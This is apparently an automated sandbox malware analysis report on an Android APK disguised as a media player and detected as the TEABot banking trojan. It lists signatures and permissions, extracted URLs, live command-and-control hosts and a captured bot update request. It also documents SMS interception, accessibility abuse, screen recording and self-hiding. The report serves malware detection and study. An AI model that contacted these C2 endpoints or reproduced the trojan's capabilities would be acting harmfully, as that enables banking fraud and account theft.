Loading ...

Play interactive tourEdit tour

Android Analysis Report MediaPlayer.apk

Overview

General Information

Sample Name:MediaPlayer.apk
Analysis ID:1532822
MD5:b694ba8bf9c8d2b9cfde8c20c76c4716
SHA1:1efda35ec2906e532c11f1be0bb55b88ea787b2d
SHA256:89e5746d0903777ef68582733c777b9ee53c42dc4d64187398e1131cccfc0599
Infos:

Most interesting Screenshot:

Detection

TEABot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected TEABot
Found detection on Joe Sandbox Cloud Basic
Multi AV Scanner detection for submitted file
Access the class loader (often done to load a new code)
Accesses FileOutputStream via Reflection
Contains a screen recorder (to take screenshot)
Drops a new dex file
Loads new DEX files via dynamic constructor
May check for install Android security applications (AV and firewalls)
Performs DNS queries to domains with low reputation
Protects itself from removal
Removes its application launcher (likely to stay hidden)
Requests to ignore battery optimizations
Starts/registers a service/receiver on screen off
Uses accessibility services (likely to control other applications)
Aborts a broadcast event (this is often done to hide phone events such as incoming SMS)
Accesses /proc
Accesses android OS build fields
Checks CPU details
Checks an internet connection is available
Creates SMS data (e.g. PDU)
Executes native commands
Found suspicious command strings (may be related to BOT commands)
Found very long method strings
Has permission to draw over other applications or user interfaces
Has permission to execute code after phone reboot
Has permission to read the SMS storage
Has permission to read the phones state (phone number, device IDs, active call ect.)
Has permission to receive SMS in the background
Has permission to send SMS in the background
Has permission to terminate background processes of other applications
Has permission to write to the SMS storage
Has permissions to create, read or change account settings (inlcuding account password settings)
Installs a new wake lock (to get activate on phone screen on)
May access the Android keyguard (lock screen)
May check for popular installed apps
Modifies the audio routing behavior
Monitors incoming SMS
Obfuscates method names
Opens an internet connection
Parses SMS data (e.g. originating address)
Performs DNS lookups (Java API)
Queries a list of installed applications
Queries camera information
Queries list of running processes/tasks
Queries media storage location field
Queries several sensitive phone informations
Queries stored mail and application accounts (e.g. Gmail or Whatsup)
Queries the list of paired Bluetooth devices
Queries the network MAC address
Queries the network operator ISO country code
Queries the unique operating system id (ANDROID_ID)
Records audio/media
Redirects camera/video feed
Requests potentially dangerous permissions
Requests root access
Uses WebRTC (often used for remote VNC)
Uses reflection

Classification

Yara Overview

No yara matches

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: MediaPlayer.apkAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: MediaPlayer.apkVirustotal: Detection: 55%Perma Link
Source: MediaPlayer.apkReversingLabs: Detection: 55%
Source: Lpiuk/blockchain/android/util/RootUtil;->checkPaths()ZMethod string: "/system/bin/su"
Source: Lpiuk/blockchain/android/util/RootUtil;->checkPaths()ZMethod string: "/system/xbin/su"
Source: org.appspot.apprtc.AppRTCBluetoothManager;->r:166API Call: android.bluetooth.BluetoothAdapter.getBondedDevices
Source: Lorg/webrtc/Camera1Enumerator;->enumerateFormats(I)Ljava/util/List;Method string: WebRTC strings
Source: org.appspot.apprtc.PeerConnectionClient;->M:89API Call: android.os.Environment.getExternalStorageDirectory
Source: org.appspot.apprtc.PeerConnectionClient;->P:214API Call: android.os.Environment.getExternalStorageDirectory
Source: com.facebook.cache.disk.DefaultDiskStorage;->isExternal:69API Call: android.os.Environment.getExternalStorageDirectory
Source: com.facebook.common.statfs.StatFsHelper;->ensureInitialized:9API Call: android.os.Environment.getExternalStorageDirectory

Networking:

barindex
Performs DNS queries to domains with low reputationShow sources
Source: DNS query: kopozkapalo.xyz
Source: DNS query: sepoloskotop.xyz
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getDefaultNetId:71API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getDefaultNetId:75API Call: android.net.ConnectivityManager.getNetworkInfo
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getNetworkState:92API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getNetworkState:96API Call: android.net.ConnectivityManager.getNetworkInfo
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getNetworkState:98API Call: android.net.NetworkInfo.isConnected
Source: cabbage.grace.solid.util.g;->b:30API Call: java.net.URL.openConnection("http://185.215.113.31:80/api/botupdate")
Source: cabbage.grace.solid.util.g;->b:30API Call: java.net.URL.openConnection("http://kopozkapalo.xyz:80/api/botupdate")
Source: cabbage.grace.solid.util.g;->b:30API Call: java.net.URL.openConnection("http://sepoloskotop.xyz:80/api/botupdate")
Source: cabbage.grace.solid.e;->a:12API Call: java.net.Socket.connect (not executed)
Source: cabbage.grace.solid.util.g;->a:2API Call: java.net.URL.openConnection (not executed)
Source: cabbage.grace.solid.util.g;->c:67API Call: java.net.URL.openConnection (not executed)
Source: org.ccil.cowan.tagsoup.Parser;->getInputStream:126API Call: java.net.URL.openConnection (not executed)
Source: cabbage.grace.solid.util.b;->n:140API Call: java.net.InetAddress.getByName (URL: "google.com")
Source: org.xbill.DNS.SimpleResolver;-><init>:9API Call: java.net.InetAddress.getByName (not executed)
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.214.234
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.196
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.196
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.31
Source: unknownDNS traffic detected: queries for: kopozkapalo.xyz
Source: unknownHTTP traffic detected: POST /api/botupdate HTTP/1.1Accept-Charset: UTF-8Content-Type: application/xmlUser-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: 185.215.113.31Connection: Keep-AliveAccept-Encoding: gzipContent-Length: 554Data Raw: 39 60 26 23 36 23 1d 37 32 26 23 36 27 60 78 39 60 2a 35 2b 26 60 78 60 27 76 77 27 74 74 72 73 7b 24 23 73 7b 76 70 7a 60 6e 60 26 27 34 2b 21 27 1d 2c 23 2f 27 60 78 60 11 23 2f 31 37 2c 25 62 05 23 2e 23 3a 3b 62 0c 27 3a 37 31 60 6e 60 32 2a 2d 2c 27 1d 2c 37 2f 20 27 30 60 78 60 2c 2d 62 32 2a 2d 2c 27 60 6e 60 20 23 36 36 27 30 3b 1d 2e 27 34 27 2e 60 78 60 73 72 72 60 6e 60 23 21 31 1d 27 2c 23 20 2e 27 26 60 78 24 23 2e 31 27 6e 60 26 2d 38 27 1d 27 2c 23 20 2e 27 26 60 78 24 23 2e 31 27 6e 60 21 2d 37 2c 36 30 3b 60 78 60 37 2c 29 2c 2d 35 2c 60 6e 60 2e 2d 21 23 2e 27 60 78 60 27 2c 1d 37 31 60 6e 60 31 21 30 27 27 2c 1d 23 21 36 2b 34 27 60 78 36 30 37 27 6e 60 31 21 30 27 27 2c 1d 31 27 21 37 30 27 60 78 24 23 2e 31 27 6e 60 31 2f 31 1d 2f 23 2c 23 25 27 30 60 78 60 36 30 2d 37 20 2e 27 6c 21 23 2c 3b 2d 2c 6c 34 23 2c 60 6e 60 23 2c 26 30 2d 2b 26 1d 34 27 30 31 2b 2d 2c 60 78 70 77 6e 60 21 37 30 30 27 2c 36 1d 2e 2d 25 25 27 26 1d 32 23 31 31 35 2d 30 26 60 78 60 60 6e 60 34 27 30 60 78 74 3f 6e 60 2e 2d 25 25 27 26 1d 31 2f 31 60 78 19 1f 6e 60 2e 2d 25 25 27 26 1d 32 37 31 2a 27 31 60 78 19 1f 6e 60 31 3b 31 36 27 2f 1d 2e 2d 25 31 60 78 19 60 70 72 70 73 6f 72 75 6f 70 7b 62 73 72 78 70 7b 7f 7c 11 36 23 30 36 62 34 70 73 62 2d 2c 62 26 2d 2f 23 2b 2c 31 62 14 0e 01 62 0f 27 26 2b 23 12 2e 23 3b 27 30 60 6e 60 70 72 70 73 6f 72 75 6f 70 7b 62 73 72 78 70 7b 7f 7c 0b 2c 31 36 23 2e 2e 27 26 62 23 21 21 27 31 31 2b 20 2b 2e 2b 36 3b 62 31 27 30 34 2b 21 27 31 62 2c 37 2e 2e 60 1f 6e 60 21 23 32 36 37 30 27 26 1d 2b 2c 28 27 21 36 31 60 78 19 1f 6e 60 21 2d 2f 32 2e 27 36 27 26 1d 21 2d 2f 2f 23 2c 26 31 60 78 19 1f 3f Data Ascii: 9`&#6#72&#6'`x9`*5+&`x`'vw'ttrs{$#s{vpz`n`&'4+!',#/'`x`#/17,%b#.#:;b':71`n`2*-,',7/ '0`x`,-b2*-,'`n` #66'0;.'4'.`x`srr`n`#!1',# .'&`x$#.1'n`&-8'',# .'&`x$#.1'n`!-7,60;`x`7,),-5,`n`.-!#.'`x`',71`n`1!0'',#!6+4'`x607'n`1!0'',1'!70'`x$#.1'n`1/1/#,#%'0`x`60-7 .'l!#,;-,l4#,`n`#,&0-+&4'01+-,`xpwn`!700',6.-%%'&2#115-0&`x``n`4'0`xt?n`.-%%'&1/1`xn`.-%%'&271*'1`xn`1;16'/.-%1`x`prpsoruop{bsrxp{|6#06b4psb-,b&-/#+,1bb'&+#.#;'0`n`prpsoruop{bsrxp{|,16#..'&b#!!'11+ +.+6;b1'04+!'1b,7..`n`!#2670'&+,('!61`xn`!-/2.'6'&!-//#,&1`x?
Source: rA.json.drString found in binary or memory: http://185.215.113.31:80/api/
Source: androidString found in binary or memory: http://185.215.113.31:80/api/botupdate
Source: login.jsString found in binary or memory: http://54.237.29.75:8080/pbank/personetics/execute
Source: akbankdirektode.cerString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: akbankdirektmobil.cerString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: index.htmlString found in binary or memory: http://code.google.com/p/zxing
Source: akbankdirektode.cerString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: akbankdirektmobil.cerString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: akbankdirektode.cerString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: akbankdirektmobil.cerString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: error.jsString found in binary or memory: http://eriwen.com/
Source: fontawesome-webfont.ttfString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Webfont
Source: oksymbol.ttfString found in binary or memory: http://fontello.com
Source: oksymbol.ttfString found in binary or memory: http://fontello.comGenerated
Source: error.jsString found in binary or memory: http://kinsey.no/blog
Source: rA.json.drString found in binary or memory: http://kopozkapalo.xyz:80/api/
Source: androidString found in binary or memory: http://kopozkapalo.xyz:80/api/botupdate
Source: error.jsString found in binary or memory: http://lucassmith.name/
Source: akbankdirektmobil.cerString found in binary or memory: http://ocsp.digicert.com0F
Source: akbankdirektode.cerString found in binary or memory: http://ocsp.digicert.com0R
Source: classes.dex, androidString found in binary or memory: http://pest.w3.org/
Source: $ic_launcher_foreground__0.xmlString found in binary or memory: http://schemas.android.com/aapt
Source: acsakpoaskopaj.xml, ic_launcher.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: classes.dex, androidString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: classes.dex, androidString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: rA.json.drString found in binary or memory: http://sepoloskotop.xyz:80/api/
Source: androidString found in binary or memory: http://sepoloskotop.xyz:80/api/botupdate
Source: mobuygakbankcom.cerString found in binary or memory: http://ss.symcb.com/ss.crl0a
Source: mobuygakbankcom.cerString found in binary or memory: http://ss.symcb.com/ss.crt0
Source: mobuygakbankcom.cerString found in binary or memory: http://ss.symcd.com0&
Source: OpenSans-Regular.ttfString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: OpenSans-Regular.ttfString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Digitized
Source: OpenSans-Regular.ttfString found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/bogons-empty
Source: classes.dexString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/bogons-empty:http://www.ccil.org/~cowan/tagsoup/features
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/cdata-elements
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/default-attributes
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/ignorable-whitespace
Source: classes.dexString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/ignorable-whitespace9http://www.ccil.org/~cowan/tagsoup/
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/ignore-bogons
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/restart-elements
Source: classes.dexString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/restart-elements7http://www.ccil.org/~cowan/tagsoup/feat
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/root-bogons
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/translate-colons
Source: classes.dexString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/translate-colons;http://www.ccil.org/~cowan/tagsoup/prop
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/properties/auto-detector
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/properties/scanner
Source: classes.dex, androidString found in binary or memory: http://www.ccil.org/~cowan/tagsoup/properties/schema
Source: classes.dex, androidString found in binary or memory: http://www.cs.caltech.edu/~adam/
Source: classes.dex, androidString found in binary or memory: http://www.cs.caltech.edu/~adam/schemas/bCard
Source: classes.dexString found in binary or memory: http://www.slf4j.org/codes.html
Source: classes.dex, androidString found in binary or memory: http://www.slf4j.org/codes.html#StaticLoggerBinder
Source: classes.dex, androidString found in binary or memory: http://www.slf4j.org/codes.html#loggerNameMismatch
Source: classes.dex, androidString found in binary or memory: http://www.slf4j.org/codes.html#multiple_bindings
Source: classes.dex, androidString found in binary or memory: http://www.slf4j.org/codes.html#no_static_mdc_binder
Source: classes.dexString found in binary or memory: http://www.slf4j.org/codes.html#null_LF
Source: classes.dexString found in binary or memory: http://www.slf4j.org/codes.html#null_LF)http://www.slf4j.org/codes.html#null_MDCA&http://www.slf4j.o
Source: classes.dex, androidString found in binary or memory: http://www.slf4j.org/codes.html#null_MDCA
Source: classes.dex, androidString found in binary or memory: http://www.slf4j.org/codes.html#replay
Source: classes.dexString found in binary or memory: http://www.slf4j.org/codes.html#replay9See
Source: classes.dex, androidString found in binary or memory: http://www.slf4j.org/codes.html#substituteLogger
Source: classes.dexString found in binary or memory: http://www.slf4j.org/codes.html#substituteLoggerKSee
Source: classes.dexString found in binary or memory: http://www.slf4j.org/codes.html#unsuccessfulInit
Source: classes.dex, androidString found in binary or memory: http://www.slf4j.org/codes.html#version_mismatch
Source: classes.dexString found in binary or memory: http://www.slf4j.org/codes.html2http://www.slf4j.org/codes.html#StaticLoggerBinder2http://www.slf4j.
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/is-standalone
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/lexical-handler/parameter-entities
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/namespaces
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/resolve-dtd-uris
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/string-interning
Source: classes.dexString found in binary or memory: http://xml.org/sax/features/unicode-normalization-checking
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/use-attributes2
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/use-locator2
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/validation
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/xml-1.1
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/features/xmlns-uris
Source: classes.dex, androidString found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: sharing.htmlString found in binary or memory: http://zxing.appspot.com/generator/
Source: classes.dexString found in binary or memory: https://algoexplorer.io/tx/
Source: classes.dexString found in binary or memory: https://algoexplorer.io/tx/$https://blockchain.com/legal/privacy0https://exchange-support.blockchain
Source: liba7ba0c.soString found in binary or memory: https://android.googlesource.com/toolchain/clang
Source: liba7ba0c.soString found in binary or memory: https://android.googlesource.com/toolchain/llvm
Source: libcrashlytics.soString found in binary or memory: https://android.googlesource.com/toolchain/llvm-project
Source: classes.dex, androidString found in binary or memory: https://blockchain.com/legal/privacy
Source: mobuygakbankcom.cerString found in binary or memory: https://d.symcb.com/cps0%
Source: mobuygakbankcom.cerString found in binary or memory: https://d.symcb.com/rpa0
Source: classes.dex, androidString found in binary or memory: https://exchange-support.blockchain.com/hc/en-us
Source: classes.dexString found in binary or memory: https://exchange.blockchain.com
Source: classes.dex, androidString found in binary or memory: https://exchange.blockchain.com/?utm_source=android_wallet&utm_medium=wallet_linking
Source: classes.dex, androidString found in binary or memory: https://exchange.blockchain.com/trade/link/
Source: classes.dexString found in binary or memory: https://exchange.blockchain.comThttps://exchange.blockchain.com/?utm_source=android_wallet&utm_mediu
Source: classes.dexString found in binary or memory: https://login.blockchain.com/
Source: rA.json.drString found in binary or memory: https://plus.google.com/
Source: rA.json.drString found in binary or memory: https://plus.google.com/%https://www.googleapis.com/auth/games
Source: classes.dexString found in binary or memory: https://stellarchain.io/tx/
Source: classes.dexString found in binary or memory: https://stellarchain.io/tx/Nhttps://support.blockchain.com/hc/en-us/articles/360000939903-Transactio
Source: classes.dex, androidString found in binary or memory: https://support.blockchain.com/hc/en-us/articles/360000939903-Transaction-fees
Source: classes.dex, androidString found in binary or memory: https://support.blockchain.com/hc/en-us/articles/360019105471-Why-do-Stellar-addresses-have-a-minimu
Source: classes.dex, androidString found in binary or memory: https://www.blockchain-status.com
Source: classes.dex, androidString found in binary or memory: https://www.blockchain.com/bch/tx/
Source: classes.dex, androidString found in binary or memory: https://www.blockchain.com/btc/tx/
Source: classes.dex, androidString found in binary or memory: https://www.blockchain.com/eth/tx/
Source: classes.dexString found in binary or memory: https://www.blockchain.com/eth/tx/-https://www.blockchain.com/legal/borrow-terms
Source: classes.dex, androidString found in binary or memory: https://www.blockchain.com/legal/borrow-terms
Source: akbankdirektode.cerString found in binary or memory: https://www.digicert.com/CPS0
Source: rA.json.dr, androidString found in binary or memory: https://www.googleapis.com/auth/games
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36710
Source: unknownNetwork traffic detected: HTTP traffic on port 36710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52144 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains a screen recorder (to take screenshot)Show sources
Source: Lcabbage/grace/solid/jd98awdAWHndoia;->i()VMethod: getDisplayMetrics and createVirtualDisplay
Source: org.appspot.apprtc.AppRTCAudioManager;->p:127API Call: android.media.AudioManager.setMode
Source: org.appspot.apprtc.AppRTCAudioManager;->q:151API Call: android.media.AudioManager.setMode
Source: org.webrtc.voiceengine.WebRtcAudioRecord;->startRecording:209API Call: android.media.AudioRecord.startRecording
Source: org.webrtc.voiceengine.WebRtcAudioRecord;->initRecording:101API Call: android.media.AudioRecord.<init>

E-Banking Fraud:

barindex
Detected TEABotShow sources
Source: Lcabbage/grace/solid/h/r;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VMethod string: TEABot strings
Source: Lb/a/a/a/c/r;->c(Landroid/content/Context;)IMethod string: "com.android.vending"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.facebook.katana"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.whatsapp"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.google.android.youtube"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.twitter.android"
Source: submitted apkRequest permission: android.permission.SEND_SMS
Source: submitted apkRequest permission: android.permission.WRITE_SMS
Source: Lb/a/a/a/c/r;->c(Landroid/content/Context;)IMethod string: "com.android.vending"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.facebook.katana"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.whatsapp"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.google.android.youtube"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.twitter.android"
Source: rA.json.drString found in binary or memory: 5Landroid/app/KeyguardManager$KeyguardDismissCallback;
Source: rA.json.drString found in binary or memory: Landroid/app/FragmentManager;5Landroid/app/KeyguardManager$KeyguardDismissCallback;
Source: rA.json.drString found in binary or memory: Landroid/app/KeyguardManager;
Source: rA.json.drString found in binary or memory: Landroid/app/KeyguardManager;)Landroid/app/Notification$Action$Builder;!Landroid/app/Notification$Action;*Landroid/app/Notification$BigPictureStyle;'Landroid/app/Notification$BigTextStyle;"Landroid/app/Notification$Builder;%Landroid/app/Notification$InboxStyle;1Landroid/app/Notification$MessagingStyle$Message;)Landroid/app/Notification$MessagingStyle; Landroid/app/Notification$Style;
Source: rA.json.drString found in binary or memory: isKeyguardLocked
Source: rA.json.drString found in binary or memory: keyguard
Source: rA.json.drString found in binary or memory: requestDismissKeyguard
Source: cabbage.grace.solid.h.a;->a:19API Call: android.os.PowerManager$WakeLock.acquire
Source: cabbage.grace.solid.receiver.AWdjkwa90dA;->b:13API Call: android.os.PowerManager$WakeLock.acquire
Source: cabbage.grace.solid.AawidnaoDNI;->p:187API Call: android.os.PowerManager$WakeLock.acquire
Source: cabbage.grace.solid.e;->d:185API Call: android.os.PowerManager$WakeLock.acquire
Source: cabbage.grace.solid.util.b;->r:161API Call: android.app.AlarmManager.setRepeating

System Summary:

barindex
Found detection on Joe Sandbox Cloud BasicShow sources
Source: MediaPlayer.apkJoe Sandbox Cloud Basic: Detection: malicious Score: 80Perma Link
Requests to ignore battery optimizationsShow sources
Source: Lcabbage/grace/solid/andaowidnAIObdnaw;->onAccessibilityEvent(Landroid/view/accessibility/AccessibilityEvent;)VMethod string: "android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"
Source: org.xbill.DNS.ResolverConfig;->f:68API Call: java.lang.Runtime.exec
Source: org.xbill.DNS.ResolverConfig;->h:99API Call: java.lang.Runtime.exec ("ipconfig /all")
Source: piuk.blockchain.android.util.RootUtil;->checkSu:19API Call: java.lang.Runtime.exec
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.MODIFY_AUDIO_SETTINGS
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: submitted apkRequest permission: android.permission.RECEIVE_MMS
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.SEND_SMS
Source: submitted apkRequest permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: submitted apkRequest permission: android.permission.WRITE_SMS
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.andAPK@0/252@2/0
Source: org.webrtc.CallSessionFileRotatingLogSink;-><clinit>:2API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.FileVideoCapturer;-><clinit>:2API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.Logging;->loadNativeLibrary:56API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.PeerConnection;-><clinit>:2API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.PeerConnectionFactory;-><clinit>:2API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.VideoFileRenderer;-><clinit>:2API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: cabbage.grace.solid.j.a;->e:36API Call: "def_sms_manager": null
Source: cabbage.grace.solid.j.a;->e:36API Call: "logged_sms": null
Source: cabbage.grace.solid.j.a;->e:36API Call: "captured_injects": null
Source: cabbage.grace.solid.j.a;->e:36API Call: "domains": null
Source: cabbage.grace.solid.j.a;->d:21API Call: android.content.SharedPreferences.getString
Source: cabbage.grace.solid.j.a;->g:42API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageModule;-><init>:16API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageModule;->onPause:27API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageModule;->onResume:34API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageManager;->getPin:31API Call: android.content.SharedPreferences.getString
Source: com.coinbase.android.PinStorage.PinStorageManager;->getSetting:36API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageManager;->verifyPin:92API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.auth.api.signin.a.d;->d:30API Call: android.content.SharedPreferences.getString
Source: com.coinbase.android.accessibilityprotection.AccessibilityProtectionDelegate;->authorized:13API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.authDataStorage.AuthDataStorageModule;->getAuthData:73API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.perf.config.DeviceCacheManager;->getBoolean:31API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.perf.config.DeviceCacheManager;->getString:98API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.flags.impl.c;->call:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.flags.impl.i;->call:5API Call: android.content.SharedPreferences.getString
Source: com.coinbase.android.secureStorage.SecureStorageManager;->getData:19API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->getPinId:183API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->getValue:221API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->getValue:227API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->getValue:232API Call: android.content.SharedPreferences.getBoolean
